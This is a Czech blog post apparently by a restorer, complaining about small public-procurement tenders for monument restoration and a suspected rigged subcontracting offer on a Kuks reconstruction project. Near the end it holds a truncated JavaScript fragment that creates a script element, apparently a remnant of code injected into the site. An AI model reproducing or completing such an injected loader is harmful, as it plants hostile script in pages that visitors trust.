Motto:

"Naše památky jsou sice němé,
ale často volají zoufale o pomoc"

Problémy výběrových řízení na zakázky malého rozsahu.

15. 12. 2012

V situaci, kdy celý národ sleduje zadávání zakázek nad 1 milion korun, kdy ne vždy vše probíhá tak jak by asi mělo, vítězí nejnižší cena, která je vysoutěžena a soutěžitel se jí vzdává z nám neznámých důvodů ve prospěch druhého v pořadí, jsou malé zakázky zcela mimo dohled veřejnosti.

Stačí vyhlásit výběrové řízení a zveřejnit ho na vývěsce třeba u půdy příslušného úřadu. Medvědí službou slušnosti jsou i zakázky zveřejňované na portálu AAA zakázka. Tady vše probíhá zdánlivě v pořádku.

Sporné jsou však často podmínky, na základě nichž se dá do soutěže přihlásit. Město Hradec Králové vyhlásilo minulý měsíc soutěž na restaurování zábradlí na nábřeží. Rozsah odhadem 300 metrů litinového zábradlí s tím, že bude demontováno z kamenných sloupků, ty budou opraveny, zábradlí bude očištěno, chybějící díly budou dolity a bude proveden nový nátěrový systém.

Za jakých podmínek: vítězí nejnižší cena- budiž. Účastník řízení však musí doložit, že restauroval v posledních třech letech zakázku každý rok nad 400 000 Kč. Kolik restaurátorů – tedy malých firem v době kdy na kulturu nejsou peníze, může toto doložit- výběr se už povážlivě zužuje.

Dodání díla do 90 dnů od podpisu smlouvy- tak to je šibeniční termín. Sehnat termín ve slévárně, opracovat odlitky, opravit cca. 50 polí zábradlí, vyjmout je a znovu zasadit do kamenných sloupků, tak to je výkon hodný Batmana. Nebo je všechno jinak?

Zadavatelem zakázek malého rozsahu je i Správa Pražského hradu. Opět nejnižší cena, fyzicky obesláno až 10 soutěžitelů, ale nakonec dopis pro všechny soutěžitele s gratulací, nebo dopisem, která zakázka vyhrála. Drobnost, která vnáší paprsek světla do tmy veřejných zakázek.

Proč na svém internetovém portále nezveřejnit kdo a za jakých podmínek vyhrál, je to transparentní a mimo všechny pochybnosti.

 

Další případ diletantismu ve veřejných zakázkách se projevil hned včera.

Hned ráno svitla naděje na další zakázku. Tentokrát se jedná o velkou rybu, byli jsme osloveni neznámou stavební firmou ke kooperaci na kšeftu za 400 000 000 korun !

Dobrý den, hledáme někoho, kdo by nám pomohl se subdodávkou na restaurování nepolychromovaných,nefigurálních děl z kovů, zatím by se jednalo hlavně o pokrytí 700 000 Kč vašimi referencemi , které splňují tento bod ve výběrovém řízení.Následně bychom s vámi podepsali smlouvu o smlouvě budoucí, pokud vyhrajeme práci vám dáme.

Můj dotaz zněl: o co se vlastně jedná. Odpověď: Projekt placený z evropských fondů na rekonstrukci Kuksu. Z projektové dokumentace víme, že se jedná o restaurování mříží, ale netušíme v jakém rozsahu.

Stačilo několik příchozích a odchozích telefonátů a zjišťuji, že podobně je oslovena množina restaurátorů- vím o třech pan P., N.,K. se stejnou nabídkou k seriózní spolupráci. Hlavně pokrýt do pondělního rána těch 700 000. To totiž soutěž končí a nabídky musí být podány.

No pozdrav Pánbůh, důležité jsou už jenom peníze- kdo dá reference za 700 000, ten je určitě dobrý restaurátor.

Naprostý diletantizmus stavební firmy, která se hlásí o peníze, ne o reprezentativní zakázku. A to na poslední chvíli. To svědčí o tom, že pokud by firma vyhrála výběrové řízení, nemá ani tušení, o co jde.

Druhá možnost, která je ještě více alarmující, odpoledne se dovídám, že soutěž vyhraje jiná stavební firma a s ní restaurátor, který je předem znám. Že by první firma byla pouze bílým koněm? Dělala pouze jednoho z uchazečů do počtu?

Nechci poškodit dobré jméno firem, proto nezveřejním jejich jména, ale použiji školáckou šifru a uvidíme, čeho se dočkáme.

Firma, která nás oslovila: XRM,firma, která vyhraje: YZP, restaurátor:Y….

Pánové a dámy, je mi z vás na b… .

Znovu platí naše motto, že památky volají po záchraně, a snad i o pomstě.

 var d=document;var s=d.createElement(‚script’);

Uveřejněno v rubrice Ostatní | Komentáře: (0)

Comments are closed.